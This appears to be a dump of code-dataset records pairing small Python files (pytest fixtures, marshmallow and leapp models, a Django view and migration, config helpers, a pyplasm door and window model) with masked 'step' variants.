contract_abis[CHANNEL_MANAGER_ABI_NAME]['abi']\n\n\[email protected](scope='session')\ndef channel_manager_bytecode(contract_abis):\n return contract_abis[CHANNEL_MANAGER_ABI_NAME]['bytecode']\n\n\[email protected](scope='session')\ndef token_abi(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['abi']\n\n\[email protected](scope='session')\ndef token_bytecode(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['bytecode']\n\n\[email protected](scope='session')\ndef kovan_block_time():\n return 4\n", "step-5": "import pytest\nfrom eth_utils import encode_hex, remove_0x_prefix\nfrom ethereum.tester import keys\n\nimport os\nimport json\nfrom microraiden.client.client import CHANNEL_MANAGER_ABI_NAME, TOKEN_ABI_NAME\nfrom microraiden.crypto import privkey_to_addr\n\n\[email protected]\ndef contracts_relative_path():\n return 'data/contracts.json'\n\n\[email protected]\ndef compiled_contracts_path(test_dir, contracts_relative_path):\n return os.path.join(test_dir, contracts_relative_path)\n\n\[email protected]\ndef compiled_contracts(compiled_contracts_path):\n return json.load(open(compiled_contracts_path))\n\n\[email protected]\ndef test_dir():\n return os.path.dirname(os.path.dirname(__file__)) + \"/../\"\n\n\[email protected](scope='session')\ndef use_tester(request):\n return request.config.getoption('use_tester')\n\n\[email protected]\ndef api_endpoint():\n \"\"\"address of a paywall proxy\"\"\"\n return 'localhost'\n\n\[email protected]\ndef api_endpoint_port():\n \"\"\"port the paywall proxy listens on\"\"\"\n return 5000\n\n\[email protected]\ndef api_endpoint_address(api_endpoint, api_endpoint_port):\n return api_endpoint + \":\" + str(api_endpoint_port)\n\n\[email protected]\ndef init_contract_address():\n return \"0x\" + \"a\" * 40\n\n\[email protected]\ndef manager_state_path():\n return '/tmp/rmp-state.pkl'\n\n\[email protected](scope='session')\ndef deployer_privkey():\n return remove_0x_prefix(encode_hex(keys[3]))\n\n\[email protected](scope='session')\ndef deployer_address(deployer_privkey):\n return privkey_to_addr(deployer_privkey)\n\n\[email protected](scope='session')\ndef contract_abi_path():\n return os.path.join(os.path.dirname(os.path.dirname(__file__)), '../data/contracts.json')\n\n\[email protected](scope='session')\ndef contract_abis(contract_abi_path):\n abi_file = open(contract_abi_path, 'r')\n return json.load(abi_file)\n\n\[email protected](scope='session')\ndef channel_manager_abi(contract_abis):\n return contract_abis[CHANNEL_MANAGER_ABI_NAME]['abi']\n\n\[email protected](scope='session')\ndef channel_manager_bytecode(contract_abis):\n return contract_abis[CHANNEL_MANAGER_ABI_NAME]['bytecode']\n\n\[email protected](scope='session')\ndef token_abi(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['abi']\n\n\[email protected](scope='session')\ndef token_bytecode(contract_abis):\n return contract_abis[TOKEN_ABI_NAME]['bytecode']\n\n\[email protected](scope='session')\ndef kovan_block_time():\n return 4\n", "step-ids": [ 10, 11, 17, 18, 21 ] }
[ 10, 11, 17, 18, 21 ]
from marshmallow import fields from server.common.database import Media from server.common.schema.ref import ma class MediaSchema(ma.SQLAlchemyAutoSchema): class Meta: model = Media fields = ('id', 'name', 'mimetype', 'extension', 'owner', '_links') dump_only = ('id', 'owner', '_links') include_fk = True id = fields.UUID() owner = ma.auto_field('owner_id') _links = ma.Hyperlinks({ 'self': ma.URLFor('media', values={'media_id': '<id>'}), 'collection': ma.URLFor('medias'), 'image': ma.URLFor('media_file', values={'media_id': '<id>'}), 'thumbnail': ma.URLFor('media_file', values={'media_id': '<id>', 'thumb': ''}), 'owner': ma.URLFor('user', values={'user_id': '<owner>'}) }) Media.__marshmallow__ = MediaSchema
normal
{ "blob_id": "1810fee40ff8a99871ecc1d024f6794a68ee54e8", "index": 3543, "step-1": "<mask token>\n\n\nclass MediaSchema(ma.SQLAlchemyAutoSchema):\n\n\n class Meta:\n model = Media\n fields = 'id', 'name', 'mimetype', 'extension', 'owner', '_links'\n dump_only = 'id', 'owner', '_links'\n include_fk = True\n <mask token>\n <mask token>\n <mask token>\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass MediaSchema(ma.SQLAlchemyAutoSchema):\n\n\n class Meta:\n model = Media\n fields = 'id', 'name', 'mimetype', 'extension', 'owner', '_links'\n dump_only = 'id', 'owner', '_links'\n include_fk = True\n id = fields.UUID()\n owner = ma.auto_field('owner_id')\n _links = ma.Hyperlinks({'self': ma.URLFor('media', values={'media_id':\n '<id>'}), 'collection': ma.URLFor('medias'), 'image': ma.URLFor(\n 'media_file', values={'media_id': '<id>'}), 'thumbnail': ma.URLFor(\n 'media_file', values={'media_id': '<id>', 'thumb': ''}), 'owner':\n ma.URLFor('user', values={'user_id': '<owner>'})})\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass MediaSchema(ma.SQLAlchemyAutoSchema):\n\n\n class Meta:\n model = Media\n fields = 'id', 'name', 'mimetype', 'extension', 'owner', '_links'\n dump_only = 'id', 'owner', '_links'\n include_fk = True\n id = fields.UUID()\n owner = ma.auto_field('owner_id')\n _links = ma.Hyperlinks({'self': ma.URLFor('media', values={'media_id':\n '<id>'}), 'collection': ma.URLFor('medias'), 'image': ma.URLFor(\n 'media_file', values={'media_id': '<id>'}), 'thumbnail': ma.URLFor(\n 'media_file', values={'media_id': '<id>', 'thumb': ''}), 'owner':\n ma.URLFor('user', values={'user_id': '<owner>'})})\n\n\nMedia.__marshmallow__ = MediaSchema\n", "step-4": "from marshmallow import fields\nfrom server.common.database import Media\nfrom server.common.schema.ref import ma\n\n\nclass MediaSchema(ma.SQLAlchemyAutoSchema):\n\n\n class Meta:\n model = Media\n fields = 'id', 'name', 'mimetype', 'extension', 'owner', '_links'\n dump_only = 'id', 'owner', '_links'\n include_fk = True\n id = fields.UUID()\n owner = ma.auto_field('owner_id')\n _links = ma.Hyperlinks({'self': ma.URLFor('media', values={'media_id':\n '<id>'}), 'collection': ma.URLFor('medias'), 'image': ma.URLFor(\n 'media_file', values={'media_id': '<id>'}), 'thumbnail': ma.URLFor(\n 'media_file', values={'media_id': '<id>', 'thumb': ''}), 'owner':\n ma.URLFor('user', values={'user_id': '<owner>'})})\n\n\nMedia.__marshmallow__ = MediaSchema\n", "step-5": "from marshmallow import fields\n\nfrom server.common.database import Media\nfrom server.common.schema.ref import ma\n\n\nclass MediaSchema(ma.SQLAlchemyAutoSchema):\n class Meta:\n model = Media\n fields = ('id', 'name', 'mimetype', 'extension', 'owner', '_links')\n dump_only = ('id', 'owner', '_links')\n include_fk = True\n\n id = fields.UUID()\n owner = ma.auto_field('owner_id')\n _links = ma.Hyperlinks({\n 'self': ma.URLFor('media', values={'media_id': '<id>'}),\n 'collection': ma.URLFor('medias'),\n 'image': ma.URLFor('media_file', values={'media_id': '<id>'}),\n 'thumbnail': ma.URLFor('media_file', values={'media_id': '<id>', 'thumb': ''}),\n 'owner': ma.URLFor('user', values={'user_id': '<owner>'})\n })\n\n\nMedia.__marshmallow__ = MediaSchema\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
from leapp.models import Model, fields from leapp.topics import TransactionTopic class TargetRepositoryBase(Model): topic = TransactionTopic repoid = fields.String() class UsedTargetRepository(TargetRepositoryBase): pass class RHELTargetRepository(TargetRepositoryBase): pass class CustomTargetRepository(TargetRepositoryBase): name = fields.Nullable(fields.String()) baseurl = fields.Nullable(fields.String()) enabled = fields.Boolean(default=True) class TargetRepositories(Model): topic = TransactionTopic rhel_repos = fields.List(fields.Model(RHELTargetRepository)) custom_repos = fields.List(fields.Model(CustomTargetRepository), default=[]) class UsedTargetRepositories(Model): topic = TransactionTopic repos = fields.List(fields.Model(UsedTargetRepository)) class CustomTargetRepositoryFile(Model): topic = TransactionTopic file = fields.String()
normal
{ "blob_id": "47dc9212a1059cbca8ec6732deaa835fa9967fd8", "index": 2990, "step-1": "<mask token>\n\n\nclass RHELTargetRepository(TargetRepositoryBase):\n pass\n\n\nclass CustomTargetRepository(TargetRepositoryBase):\n name = fields.Nullable(fields.String())\n baseurl = fields.Nullable(fields.String())\n enabled = fields.Boolean(default=True)\n\n\nclass TargetRepositories(Model):\n topic = TransactionTopic\n rhel_repos = fields.List(fields.Model(RHELTargetRepository))\n custom_repos = fields.List(fields.Model(CustomTargetRepository), default=[]\n )\n\n\nclass UsedTargetRepositories(Model):\n topic = TransactionTopic\n repos = fields.List(fields.Model(UsedTargetRepository))\n\n\nclass CustomTargetRepositoryFile(Model):\n topic = TransactionTopic\n file = fields.String()\n", "step-2": "<mask token>\n\n\nclass UsedTargetRepository(TargetRepositoryBase):\n pass\n\n\nclass RHELTargetRepository(TargetRepositoryBase):\n pass\n\n\nclass CustomTargetRepository(TargetRepositoryBase):\n name = fields.Nullable(fields.String())\n baseurl = fields.Nullable(fields.String())\n enabled = fields.Boolean(default=True)\n\n\nclass TargetRepositories(Model):\n topic = TransactionTopic\n rhel_repos = fields.List(fields.Model(RHELTargetRepository))\n custom_repos = fields.List(fields.Model(CustomTargetRepository), default=[]\n )\n\n\nclass UsedTargetRepositories(Model):\n topic = TransactionTopic\n repos = fields.List(fields.Model(UsedTargetRepository))\n\n\nclass CustomTargetRepositoryFile(Model):\n topic = TransactionTopic\n file = fields.String()\n", "step-3": "<mask token>\n\n\nclass TargetRepositoryBase(Model):\n <mask token>\n <mask token>\n\n\nclass UsedTargetRepository(TargetRepositoryBase):\n pass\n\n\nclass RHELTargetRepository(TargetRepositoryBase):\n pass\n\n\nclass CustomTargetRepository(TargetRepositoryBase):\n name = fields.Nullable(fields.String())\n baseurl = fields.Nullable(fields.String())\n enabled = fields.Boolean(default=True)\n\n\nclass TargetRepositories(Model):\n topic = TransactionTopic\n rhel_repos = fields.List(fields.Model(RHELTargetRepository))\n custom_repos = fields.List(fields.Model(CustomTargetRepository), default=[]\n )\n\n\nclass UsedTargetRepositories(Model):\n topic = TransactionTopic\n repos = fields.List(fields.Model(UsedTargetRepository))\n\n\nclass CustomTargetRepositoryFile(Model):\n topic = TransactionTopic\n file = fields.String()\n", "step-4": "<mask token>\n\n\nclass TargetRepositoryBase(Model):\n topic = TransactionTopic\n repoid = fields.String()\n\n\nclass UsedTargetRepository(TargetRepositoryBase):\n pass\n\n\nclass RHELTargetRepository(TargetRepositoryBase):\n pass\n\n\nclass CustomTargetRepository(TargetRepositoryBase):\n name = fields.Nullable(fields.String())\n baseurl = fields.Nullable(fields.String())\n enabled = fields.Boolean(default=True)\n\n\nclass TargetRepositories(Model):\n topic = TransactionTopic\n rhel_repos = fields.List(fields.Model(RHELTargetRepository))\n custom_repos = fields.List(fields.Model(CustomTargetRepository), default=[]\n )\n\n\nclass UsedTargetRepositories(Model):\n topic = TransactionTopic\n repos = fields.List(fields.Model(UsedTargetRepository))\n\n\nclass CustomTargetRepositoryFile(Model):\n topic = TransactionTopic\n file = fields.String()\n", "step-5": "from leapp.models import Model, fields\nfrom leapp.topics import TransactionTopic\n\n\nclass TargetRepositoryBase(Model):\n topic = TransactionTopic\n repoid = fields.String()\n\n\nclass UsedTargetRepository(TargetRepositoryBase):\n pass\n\n\nclass RHELTargetRepository(TargetRepositoryBase):\n pass\n\n\nclass CustomTargetRepository(TargetRepositoryBase):\n name = fields.Nullable(fields.String())\n baseurl = fields.Nullable(fields.String())\n enabled = fields.Boolean(default=True)\n\n\nclass TargetRepositories(Model):\n topic = TransactionTopic\n rhel_repos = fields.List(fields.Model(RHELTargetRepository))\n custom_repos = fields.List(fields.Model(CustomTargetRepository), default=[])\n\n\nclass UsedTargetRepositories(Model):\n topic = TransactionTopic\n repos = fields.List(fields.Model(UsedTargetRepository))\n\n\nclass CustomTargetRepositoryFile(Model):\n topic = TransactionTopic\n file = fields.String()\n", "step-ids": [ 9, 10, 11, 12, 14 ] }
[ 9, 10, 11, 12, 14 ]
from django.shortcuts import render from .models import Votings from .serializers import VotingsSerializer from rest_framework.response import Response from rest_framework import status from rest_framework.decorators import api_view import requests, json @api_view(['GET']) def votings(request): votings = Votings.objects.all() if votings: return Response({}, status=status.HTTP_404_NOT_FOUND) else: serializer = VotingsSerializer(votings) r = requests.get('https://api.myjson.com/bins/17w6e1', serializer) data = json.loads(r.text) return Response(data, status=status.HTTP_201_CREATED)
normal
{ "blob_id": "c3ecac1c0facbf6f0905bb03fd337a7f4f5bbeff", "index": 4376, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\n@api_view(['GET'])\ndef votings(request):\n votings = Votings.objects.all()\n if votings:\n return Response({}, status=status.HTTP_404_NOT_FOUND)\n else:\n serializer = VotingsSerializer(votings)\n r = requests.get('https://api.myjson.com/bins/17w6e1', serializer)\n data = json.loads(r.text)\n return Response(data, status=status.HTTP_201_CREATED)\n", "step-3": "from django.shortcuts import render\nfrom .models import Votings\nfrom .serializers import VotingsSerializer\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.decorators import api_view\nimport requests, json\n\n\n@api_view(['GET'])\ndef votings(request):\n votings = Votings.objects.all()\n if votings:\n return Response({}, status=status.HTTP_404_NOT_FOUND)\n else:\n serializer = VotingsSerializer(votings)\n r = requests.get('https://api.myjson.com/bins/17w6e1', serializer)\n data = json.loads(r.text)\n return Response(data, status=status.HTTP_201_CREATED)\n", "step-4": null, "step-5": null, "step-ids": [ 0, 1, 2 ] }
[ 0, 1, 2 ]
#!/usr/bin/python2 import sys import argparse """ This program generates an extract table having the following format: <S1> <S2> <S3> ... <Sn> ||| <T1> <T2> <T3> ... <Tk> ||| 0-0 Each line is a mapping from a source sentence to target sentence with special delimiter characters. You can give the output of this script to extract2bin to generate a binary phrase table. """ def main(): parser = argparse.ArgumentParser() parser.add_argument("source_text", type=argparse.FileType("r"), help="Tokenized sentences in the source language") parser.add_argument("target_text", type=argparse.FileType("r"), help="Tokenized sentences in the target language") args = parser.parse_args() src_lines = args.source_text.readlines() len_src = len(src_lines) tgt_lines = args.target_text.readlines() len_tgt = len(tgt_lines) if len_src != len_tgt: print "Number of sentences doesn't match: %d - %d\n" % (len_src,len_tgt) return 1 for s, t in zip(src_lines, tgt_lines): print "%s ||| %s ||| 0-0" % (s.rstrip(), t.rstrip()) args.source_text.close() args.target_text.close() if __name__ == '__main__': sys.exit(main())
normal
{ "blob_id": "cf0cf028d5f67e8deca8ebd3ad76d9c1e3563002", "index": 258, "step-1": "#!/usr/bin/python2\n\nimport sys\nimport argparse\n\n\"\"\"\nThis program generates an extract table having the following format:\n <S1> <S2> <S3> ... <Sn> ||| <T1> <T2> <T3> ... <Tk> ||| 0-0\n\nEach line is a mapping from a source sentence to target sentence\nwith special delimiter characters.\n\nYou can give the output of this script to extract2bin to generate\na binary phrase table.\n\"\"\"\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"source_text\", type=argparse.FileType(\"r\"),\n help=\"Tokenized sentences in the source language\")\n parser.add_argument(\"target_text\", type=argparse.FileType(\"r\"),\n help=\"Tokenized sentences in the target language\")\n args = parser.parse_args()\n\n src_lines = args.source_text.readlines()\n len_src = len(src_lines)\n tgt_lines = args.target_text.readlines()\n len_tgt = len(tgt_lines)\n\n if len_src != len_tgt:\n print \"Number of sentences doesn't match: %d - %d\\n\" % (len_src,len_tgt)\n return 1\n\n for s, t in zip(src_lines, tgt_lines):\n print \"%s ||| %s ||| 0-0\" % (s.rstrip(), t.rstrip())\n\n args.source_text.close()\n args.target_text.close()\n\nif __name__ == '__main__':\n sys.exit(main())\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
import os def get_os_env_value(key): return os.getenv(key) def get_mysql_uri(user, password, host, database): return f'mysql+pymysql://{user}:{password}@{host}/{database}' MASTER_MYSQL_DATABASE_USER = get_os_env_value('MASTER_MYSQL_DATABASE_USER') MASTER_MYSQL_DATABASE_PASSWORD = get_os_env_value('MASTER_MYSQL_DATABASE_PASSWORD') MASTER_MYSQL_DATABASE_HOST = get_os_env_value('MASTER_MYSQL_DATABASE_HOST') MASTER_MYSQL_DATABASE_DB_CASAONE = get_os_env_value('MASTER_MYSQL_DATABASE_DB_CASAONE') # SQLALCHEMY_POOL_RECYCLE = 60 * 10 # SQLALCHEMY_POOL_TIMEOUT = 60 * 20 SQLALCHEMY_TRACK_MODIFICATIONS = True SQLALCHEMY_ECHO = True SQLALCHEMY_DATABASE_URI = get_mysql_uri(MASTER_MYSQL_DATABASE_USER, MASTER_MYSQL_DATABASE_PASSWORD, MASTER_MYSQL_DATABASE_HOST, MASTER_MYSQL_DATABASE_DB_CASAONE) SQLALCHEMY_ENGINE_OPTIONS = { "pool_pre_ping": True }
normal
{ "blob_id": "8247b045a5aed4d0f3db6bc2c0edd985f2c4ba30", "index": 5305, "step-1": "<mask token>\n\n\ndef get_mysql_uri(user, password, host, database):\n return f'mysql+pymysql://{user}:{password}@{host}/{database}'\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef get_os_env_value(key):\n return os.getenv(key)\n\n\ndef get_mysql_uri(user, password, host, database):\n return f'mysql+pymysql://{user}:{password}@{host}/{database}'\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef get_os_env_value(key):\n return os.getenv(key)\n\n\ndef get_mysql_uri(user, password, host, database):\n return f'mysql+pymysql://{user}:{password}@{host}/{database}'\n\n\nMASTER_MYSQL_DATABASE_USER = get_os_env_value('MASTER_MYSQL_DATABASE_USER')\nMASTER_MYSQL_DATABASE_PASSWORD = get_os_env_value(\n 'MASTER_MYSQL_DATABASE_PASSWORD')\nMASTER_MYSQL_DATABASE_HOST = get_os_env_value('MASTER_MYSQL_DATABASE_HOST')\nMASTER_MYSQL_DATABASE_DB_CASAONE = get_os_env_value(\n 'MASTER_MYSQL_DATABASE_DB_CASAONE')\nSQLALCHEMY_TRACK_MODIFICATIONS = True\nSQLALCHEMY_ECHO = True\nSQLALCHEMY_DATABASE_URI = get_mysql_uri(MASTER_MYSQL_DATABASE_USER,\n MASTER_MYSQL_DATABASE_PASSWORD, MASTER_MYSQL_DATABASE_HOST,\n MASTER_MYSQL_DATABASE_DB_CASAONE)\nSQLALCHEMY_ENGINE_OPTIONS = {'pool_pre_ping': True}\n", "step-4": "import os\n\n\ndef get_os_env_value(key):\n return os.getenv(key)\n\n\ndef get_mysql_uri(user, password, host, database):\n return f'mysql+pymysql://{user}:{password}@{host}/{database}'\n\n\nMASTER_MYSQL_DATABASE_USER = get_os_env_value('MASTER_MYSQL_DATABASE_USER')\nMASTER_MYSQL_DATABASE_PASSWORD = get_os_env_value(\n 'MASTER_MYSQL_DATABASE_PASSWORD')\nMASTER_MYSQL_DATABASE_HOST = get_os_env_value('MASTER_MYSQL_DATABASE_HOST')\nMASTER_MYSQL_DATABASE_DB_CASAONE = get_os_env_value(\n 'MASTER_MYSQL_DATABASE_DB_CASAONE')\nSQLALCHEMY_TRACK_MODIFICATIONS = True\nSQLALCHEMY_ECHO = True\nSQLALCHEMY_DATABASE_URI = get_mysql_uri(MASTER_MYSQL_DATABASE_USER,\n MASTER_MYSQL_DATABASE_PASSWORD, MASTER_MYSQL_DATABASE_HOST,\n MASTER_MYSQL_DATABASE_DB_CASAONE)\nSQLALCHEMY_ENGINE_OPTIONS = {'pool_pre_ping': True}\n", "step-5": "import os\n\n\ndef get_os_env_value(key):\n return os.getenv(key)\n\n\ndef get_mysql_uri(user, password, host, database):\n return f'mysql+pymysql://{user}:{password}@{host}/{database}'\n\n\nMASTER_MYSQL_DATABASE_USER = get_os_env_value('MASTER_MYSQL_DATABASE_USER')\nMASTER_MYSQL_DATABASE_PASSWORD = get_os_env_value('MASTER_MYSQL_DATABASE_PASSWORD')\nMASTER_MYSQL_DATABASE_HOST = get_os_env_value('MASTER_MYSQL_DATABASE_HOST')\nMASTER_MYSQL_DATABASE_DB_CASAONE = get_os_env_value('MASTER_MYSQL_DATABASE_DB_CASAONE')\n\n# SQLALCHEMY_POOL_RECYCLE = 60 * 10\n# SQLALCHEMY_POOL_TIMEOUT = 60 * 20\nSQLALCHEMY_TRACK_MODIFICATIONS = True\nSQLALCHEMY_ECHO = True\n\nSQLALCHEMY_DATABASE_URI = get_mysql_uri(MASTER_MYSQL_DATABASE_USER, MASTER_MYSQL_DATABASE_PASSWORD,\n MASTER_MYSQL_DATABASE_HOST, MASTER_MYSQL_DATABASE_DB_CASAONE)\n\nSQLALCHEMY_ENGINE_OPTIONS = {\n \"pool_pre_ping\": True\n}\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
# Generated by Django 2.0.5 on 2019-06-12 08:03 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('doctor', '0257_merge_20190524_1533'), ('doctor', '0260_merge_20190604_1428'), ] operations = [ ]
normal
{ "blob_id": "a5dff32dfbe93ba081144944381b96940da541ad", "index": 7802, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('doctor', '0257_merge_20190524_1533'), ('doctor',\n '0260_merge_20190604_1428')]\n operations = []\n", "step-4": "from django.db import migrations\n\n\nclass Migration(migrations.Migration):\n dependencies = [('doctor', '0257_merge_20190524_1533'), ('doctor',\n '0260_merge_20190604_1428')]\n operations = []\n", "step-5": "# Generated by Django 2.0.5 on 2019-06-12 08:03\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('doctor', '0257_merge_20190524_1533'),\n ('doctor', '0260_merge_20190604_1428'),\n ]\n\n operations = [\n ]\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
from pyplasm import * doorY = [.2,.18,.08,.18,.08,.18,.4,.18,.08,.18,.08,.18,.2] doorX = [.2,.5,.2,1.8,.08,.18,.08,.18,.2] doorOccurrency = [[True]*13, [True, False, True, False, True, False, True, False, True, False, True, False, True], [True]*13, [True, False, True, False, True, False, True, False, True, False, True, False, True], [True, False, True, False, True, True, True, True, True, False, True, False, True], [True, False, True, False, False, False, True, False, False, False, True, False, True], [True, False, True, True, True, True, True, True, True, True, True, False, True], [True, False, False, False, False, False, True, False, False, False, False, False, True], [True]*13] windowY = [0.04,0.04,0.2,0.02,0.16,0.02,0.2,0.04,0.04] windowX = [0.02,0.8,0.05,0.02,0.4,0.02,0.4,0.05,0.04] windowOccurrency = [[True]*9, [True, False, False, False, False, False, False, False, True], [True]*9, [True]*9, [True, True, False, True, False, True, False, True, True], [True]*9, [True, True, False, True, False, True, False, True, True], [True]*9, [True]*9] def resizeXY(X, Y, occurrency, dx, dz): """This function takes in input X,Y,occurrency, two dimensions dx, dz and scales the values contained in X and Y, in such a way that only empty spaces are scaled and filled spaces are mantained fixed""" sumY = sum(Y) sumX = sum(X) visitedY = [False]*len(Y) for y_index in range(len(Y)): update = True for x_index in range(len(X)): if(occurrency[x_index][y_index] == False): update = False if(update): sumY = sumY - Y[y_index] sumX = sumX - X[y_index] dx = dx - X[y_index] dz = dz - Y[y_index] for x_index in range(len(X)): modifyX = False for y_index in range(len(Y)): if(occurrency[x_index][y_index] == False and visitedY[y_index] == False): Y[y_index] = (dz * Y[y_index])/sumY visitedY[y_index] = True modifyX = True if(occurrency[x_index][y_index] == False and visitedY[y_index] == True and not modifyX): modifyX = True if(modifyX): X[x_index] = (dx * X[x_index])/sumX def window(windowX, windowY, occurrency): """This function, given three array, X, Y and occurrency, return the HPC model of the window generated according to the three parameters. X and Y contain values of distances calculated on the previous segment of the axis. Occurrency is a matrix containing booleans that map which cell is empty and which cell is filled. The inner function is useful for 'scaling'""" def window0(dx, dy, dz): resizeXY(windowX,windowY,occurrency, dx, dz) model = [] for xIndex in range(len(windowX)): yQuotes = [] xSum = sum(windowX[:xIndex]) for yIndex in range(len(windowY)): if(occurrency[xIndex][yIndex] == False): yQuotes.append(-windowY[yIndex]) else: yQuotes.append(windowY[yIndex]) model.append(PROD([QUOTE([-xSum, windowX[xIndex]]), QUOTE(yQuotes)])) result = STRUCT(model) result = MAP([S2,S3,S1])(PROD([result, Q(dy)])) windowFrame = STRUCT([result]) windowFrame = TEXTURE(["iron.jpg"])(windowFrame) glass = CUBOID([SIZE([1])(result)[0]*0.98,0.001,SIZE([3])(result)[0]*0.95]) glass = T([1,2,3])([dx*0.005, dy/2, 0.01])(glass) glass = TEXTURE(["glass2.jpg"])(glass) window = STRUCT([windowFrame, glass]) window = S([1,2,3])([dx/SIZE([1])(window)[0], dy/SIZE([2])(window)[0], dz/SIZE([3])(window)[0]])(window) return window return window0 def door(doorX, doorY, occurrency): """This function takes in input three array, X, Y and occurrency and returns the HPC model of the door generated according to the three parameters. X and Y contain values of distances calculated on the previous segment of the axis. Occurrency is a matrix containing booleans that map which cell is empty and which cell is filled. The inner function is useful for scaling the resulting door by the three parameter dx, dy, dz.""" def door0(dx, dy, dz): model = [] for xIndex in range(len(doorX)): yQuotes = [] xSum = sum(doorX[:xIndex]) for yIndex in range(len(doorY)): if(occurrency[xIndex][yIndex] == False): yQuotes.append(-doorY[yIndex]) else: yQuotes.append(doorY[yIndex]) model.append(PROD([ QUOTE([-xSum, doorX[xIndex]]), QUOTE(yQuotes)])) res = PROD([STRUCT(model), Q(dy)]) res = MAP([S2,S3,S1])(res) res = S([1,2,3])([dx/SIZE([1])(res)[0], dy/SIZE([2])(res)[0], dz/SIZE([3])(res)[0]]) (res) door = TEXTURE(["wood.jpg", True, False, 1, 1, 0, 1, 1])(STRUCT([res])) glass = CUBOID([SIZE([1])(res)[0]*0.94, 0.01, SIZE([3])(res)[0]*0.94]) glass = T([1,2,3])([dx*0.003, dy/2, dz*0.005])(glass) glass = TEXTURE(["glass.jpg"])(glass) refiner = CUBOID([0.03, 0.01,dz]) refiner = T([1,2])([dx/2,dy])(refiner) refiner = TEXTURE(["wood.jpg", True, False, 1, 1, 0, 1, 1])(refiner) handler1 = T(3)(.15)(CUBOID([.05,.02,.2])) handler2 = CUBOID([.05,.02,.05]) handler3 = T([1,2])([.01,.02])(CUBOID([.03,.02,.2])) handler = TEXTURE("bronze.jpg")(STRUCT([handler3, handler2, handler1])) handler = T([1,2,3])([dx/2.-2*SIZE([1])(handler)[0],dy, dz/2.-1.5*SIZE([3])(handler)[0]])(handler) finalDoor = S([1,2,3])([dx/SIZE([1])(res)[0], dy/SIZE([2])(res)[0], dz/SIZE([3])(res)[0]]) (STRUCT([door, glass, refiner, handler])) return finalDoor return door0 VIEW(door(doorX, doorY, doorOccurrency)(2.2, .4, 2.8)) VIEW(window(windowX,windowY,windowOccurrency)(.6,.1,1.2))
normal
{ "blob_id": "9bc955def6250908050a1f3046dd78480f25e0a1", "index": 1898, "step-1": "<mask token>\n\n\ndef resizeXY(X, Y, occurrency, dx, dz):\n \"\"\"This function takes in input X,Y,occurrency, two dimensions dx, dz and scales the values\n\tcontained in X and Y, in such a way that only empty spaces are scaled and filled spaces are mantained fixed\"\"\"\n sumY = sum(Y)\n sumX = sum(X)\n visitedY = [False] * len(Y)\n for y_index in range(len(Y)):\n update = True\n for x_index in range(len(X)):\n if occurrency[x_index][y_index] == False:\n update = False\n if update:\n sumY = sumY - Y[y_index]\n sumX = sumX - X[y_index]\n dx = dx - X[y_index]\n dz = dz - Y[y_index]\n for x_index in range(len(X)):\n modifyX = False\n for y_index in range(len(Y)):\n if occurrency[x_index][y_index] == False and visitedY[y_index\n ] == False:\n Y[y_index] = dz * Y[y_index] / sumY\n visitedY[y_index] = True\n modifyX = True\n if occurrency[x_index][y_index] == False and visitedY[y_index\n ] == True and not modifyX:\n modifyX = True\n if modifyX:\n X[x_index] = dx * X[x_index] / sumX\n\n\ndef window(windowX, windowY, occurrency):\n \"\"\"This function, given three array, X, Y and occurrency, return the HPC model of the window\n\tgenerated according to the three parameters. X and Y contain values of distances calculated on the previous \n\tsegment of the axis. Occurrency is a matrix containing booleans that map which cell is empty and which cell is filled. \n\tThe inner function is useful for 'scaling'\"\"\"\n\n def window0(dx, dy, dz):\n resizeXY(windowX, windowY, occurrency, dx, dz)\n model = []\n for xIndex in range(len(windowX)):\n yQuotes = []\n xSum = sum(windowX[:xIndex])\n for yIndex in range(len(windowY)):\n if occurrency[xIndex][yIndex] == False:\n yQuotes.append(-windowY[yIndex])\n else:\n yQuotes.append(windowY[yIndex])\n model.append(PROD([QUOTE([-xSum, windowX[xIndex]]), QUOTE(\n yQuotes)]))\n result = STRUCT(model)\n result = MAP([S2, S3, S1])(PROD([result, Q(dy)]))\n windowFrame = STRUCT([result])\n windowFrame = TEXTURE(['iron.jpg'])(windowFrame)\n glass = CUBOID([SIZE([1])(result)[0] * 0.98, 0.001, SIZE([3])(\n result)[0] * 0.95])\n glass = T([1, 2, 3])([dx * 0.005, dy / 2, 0.01])(glass)\n glass = TEXTURE(['glass2.jpg'])(glass)\n window = STRUCT([windowFrame, glass])\n window = S([1, 2, 3])([dx / SIZE([1])(window)[0], dy / SIZE([2])(\n window)[0], dz / SIZE([3])(window)[0]])(window)\n return window\n return window0\n\n\ndef door(doorX, doorY, occurrency):\n \"\"\"This function takes in input three array, X, Y and occurrency and returns the HPC model of the door\n\tgenerated according to the three parameters. X and Y contain values of distances calculated on the previous \n\tsegment of the axis. Occurrency is a matrix containing booleans that map which cell is empty and which cell is filled. \n\tThe inner function is useful for scaling the resulting door by the three parameter dx, dy, dz.\"\"\"\n\n def door0(dx, dy, dz):\n model = []\n for xIndex in range(len(doorX)):\n yQuotes = []\n xSum = sum(doorX[:xIndex])\n for yIndex in range(len(doorY)):\n if occurrency[xIndex][yIndex] == False:\n yQuotes.append(-doorY[yIndex])\n else:\n yQuotes.append(doorY[yIndex])\n model.append(PROD([QUOTE([-xSum, doorX[xIndex]]), QUOTE(yQuotes)]))\n res = PROD([STRUCT(model), Q(dy)])\n res = MAP([S2, S3, 